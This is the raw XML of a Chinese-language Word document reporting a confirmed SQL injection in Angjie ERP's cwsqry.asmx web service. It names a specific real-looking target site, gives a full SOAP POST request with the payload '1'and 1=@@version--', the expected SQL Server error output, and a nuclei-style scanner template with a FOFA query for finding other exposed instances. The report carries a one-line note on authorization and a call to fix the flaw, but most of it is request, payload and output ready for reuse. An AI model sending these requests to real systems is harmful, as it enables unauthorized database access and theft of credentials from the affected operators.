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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>昂捷ERP SQL注入漏洞复现报告（已确认存在）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>目标URL：http://djoutlets.cn/EnjoyRMIS_WS/WS/ReportTool/cwsqry.asmx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>复现步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>使用Burp Suite或Postman发送以下POST请求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>POST /EnjoyRMIS_WS/WS/ReportTool/cwsqry.asmx HTTP/1.1</w:t>
        <w:br/>
        <w:t>Connection: keep-alive</w:t>
        <w:br/>
        <w:t>SOAPAction: "http://tempuri.org/GetDictionary"</w:t>
        <w:br/>
        <w:t>Content-Type: text/xml;charset=UTF-8</w:t>
        <w:br/>
        <w:t>Host: djoutlets.cn</w:t>
        <w:br/>
        <w:t>Content-Length: 327</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>1'and 1=@@version--</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>验证漏洞存在条件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>响应状态码必须为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
          <w:b/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>响应正文中必须同时包含以下特征字符串：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>nvarchar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>漏洞验证示例：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>当发送上述请求后，若返回类似以下错误响应则证明漏洞存在：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>System.Data.SqlClient.SqlException: 指令预期。</w:t>
        <w:br/>
        <w:t>位置 10。</w:t>
        <w:br/>
        <w:t xml:space="preserve">Microsoft SQL Server 2019 (RTM-CU14) (KB5026268) 版本 15.0.4198.4 (x64) </w:t>
        <w:br/>
        <w:t xml:space="preserve">开发人员版本 ... </w:t>
        <w:br/>
        <w:t>nvarchar(128)...</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>漏洞影响：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>该SQL注入漏洞可被利用获取数据库敏感信息，包括但不限于数据库版本、表结构、用户凭证等，建议立即修复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>注：本报告基于已确认的漏洞状态编写，复现过程中请确保符合目标系统的授权范围。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>复现POC如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>id: angjie_erp_cwsqry_sqli</w:t>
        <w:br/>
        <w:br/>
        <w:t>info:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: angjie_erp_cwsqry_sqli</w:t>
        <w:br/>
        <w:t xml:space="preserve">  author: bugscanner</w:t>
        <w:br/>
        <w:t xml:space="preserve">  severity: critical</w:t>
        <w:br/>
        <w:t xml:space="preserve">  metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    vulnsystem: 昂捷ERP cwsapprove接口</w:t>
        <w:br/>
        <w:t xml:space="preserve">    uploaduri: /EnjoyRMIS_WS/WS/ReportTool/cwsqry.asmx</w:t>
        <w:br/>
        <w:t xml:space="preserve">    vulntype: SQL注入</w:t>
        <w:br/>
        <w:t xml:space="preserve">    otherinfo: sql注入演示获取数据库名</w:t>
        <w:br/>
        <w:t xml:space="preserve">    fofasearch: body="/Scripts/EnjoyMsg.js"</w:t>
        <w:br/>
        <w:br/>
        <w:t>http:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - raw:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - |</w:t>
        <w:br/>
        <w:t xml:space="preserve">        POST /EnjoyRMIS_WS/WS/ReportTool/cwsqry.asmx HTTP/1.1</w:t>
        <w:br/>
        <w:t xml:space="preserve">        Connection: keep-alive</w:t>
        <w:br/>
        <w:t xml:space="preserve">        SOAPAction: http://tempuri.org/GetDictionary</w:t>
        <w:br/>
        <w:t xml:space="preserve">        Content-Type: text/xml;charset=UTF-8</w:t>
        <w:br/>
        <w:t xml:space="preserve">        Host: </w:t>
        <w:br/>
        <w:t xml:space="preserve">        Content-Length: 327</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>type: string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>1'and 1=@@version--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t xml:space="preserve">matchers: </w:t>
        <w:br/>
        <w:t xml:space="preserve">      - type: dsl</w:t>
        <w:br/>
        <w:t xml:space="preserve">        condition: and</w:t>
        <w:br/>
        <w:t xml:space="preserve">        dsl:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          - status_code == 500 &amp;&amp;  contains_all(body, 'nvarchar') &amp;&amp; contains_all(body, 'Microsoft')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf"/>
        </w:rPr>
        <w:t>复现截图：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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.tt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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.ttf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../Hack-Font.ttf" w:hAnsi="../Hack-Font.ttf" w:eastAsia="../Hack-Font.ttf" w:cs="../Hack-Font.tt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